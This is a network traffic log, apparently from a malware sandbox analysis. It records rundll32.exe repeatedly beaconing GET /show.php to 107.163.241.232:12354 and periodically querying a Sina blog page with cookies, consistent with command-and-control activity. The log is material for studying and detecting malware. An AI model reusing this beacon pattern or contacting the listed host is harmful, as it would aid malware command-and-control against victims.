Dec 11, 2024 16:28:04.813244104 CET	214	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Cookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Dec 11, 2024 16:28:06.380290031 CET	371	IN	HTTP/1.1 302 Moved Temporarily Server: nginx/1.2.8 Date: Wed, 11 Dec 2024 15:28:06 GMT Content-Type: text/html Content-Length: 160 Connection: keep-alive Location: https://blog.sina.com.cn/u/5655029807 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.7	50415	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:07.171730995 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.7	50422	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:07.564228058 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.7	50454	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:09.436985016 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.7	50459	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:10.418580055 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.7	50464	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:11.335460901 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.7	50467	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:11.436767101 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.7	50469	202.108.0.52	80	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:11.600507975 CET	214	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Cookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Dec 11, 2024 16:28:13.170536995 CET	371	IN	HTTP/1.1 302 Moved Temporarily Server: nginx/1.2.8 Date: Wed, 11 Dec 2024 15:28:12 GMT Content-Type: text/html Content-Length: 160 Connection: keep-alive Location: https://blog.sina.com.cn/u/5655029807 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.7	50506	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:13.583698988 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.7	50509	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:13.712595940 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.7	50545	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:15.327974081 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.7	50549	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:15.456660032 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.7	50550	202.108.0.52	80	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:15.459328890 CET	214	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Cookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Dec 11, 2024 16:28:17.010035038 CET	371	IN	HTTP/1.1 302 Moved Temporarily Server: nginx/1.2.8 Date: Wed, 11 Dec 2024 15:28:16 GMT Content-Type: text/html Content-Length: 160 Connection: keep-alive Location: https://blog.sina.com.cn/u/5655029807 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.7	50599	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:17.581948042 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.7	50603	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:17.708909988 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.7	50643	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:19.532299995 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.7	50648	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:19.652107954 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.7	50649	202.108.0.52	80	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:19.652231932 CET	214	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Cookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Dec 11, 2024 16:28:21.243556976 CET	371	IN	HTTP/1.1 302 Moved Temporarily Server: nginx/1.2.8 Date: Wed, 11 Dec 2024 15:28:20 GMT Content-Type: text/html Content-Length: 160 Connection: keep-alive Location: https://blog.sina.com.cn/u/5655029807 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.7	50713	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:21.765875101 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.7	50717	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:21.908092976 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.7	50762	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:23.552505016 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.7	50770	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:23.766520977 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.7	50771	202.108.0.52	80	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:23.766645908 CET	214	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Cookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.7	50838	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:25.785583973 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache
Dec 11, 2024 16:28:26.225152969 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.7	50845	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:26.111830950 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.7	50850	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:26.320516109 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.7	50865	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:26.562505960 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.7	50872	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:26.806874990 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.7	50885	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:27.047611952 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.7	50897	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:27.315891981 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.7	50923	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:27.676136971 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.7	50927	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:27.788158894 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.7	50929	202.108.0.52	80	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:27.792555094 CET	214	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Cookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.7	50939	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:27.919553995 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.7	50945	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:28.037574053 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.7	50956	202.108.0.52	80	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:28.146253109 CET	214	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Cookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.7	50957	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:28.160213947 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.7	50965	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:28.307828903 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.7	50966	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:28.412017107 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.7	50971	202.108.0.52	80	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:28.512911081 CET	214	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Cookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.7	50973	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:28.547658920 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.7	50984	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:28.730633020 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.7	50987	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:28.789135933 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.7	50995	202.108.0.52	80	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:28.907360077 CET	214	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Cookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.7	50998	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:28.973577023 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.7	51005	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:29.092278004 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.7	51012	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:29.213087082 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.7	51020	202.108.0.52	80	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:29.321450949 CET	214	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Cookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.7	51021	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:29.333044052 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.7	51029	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:29.621289968 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.7	51037	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
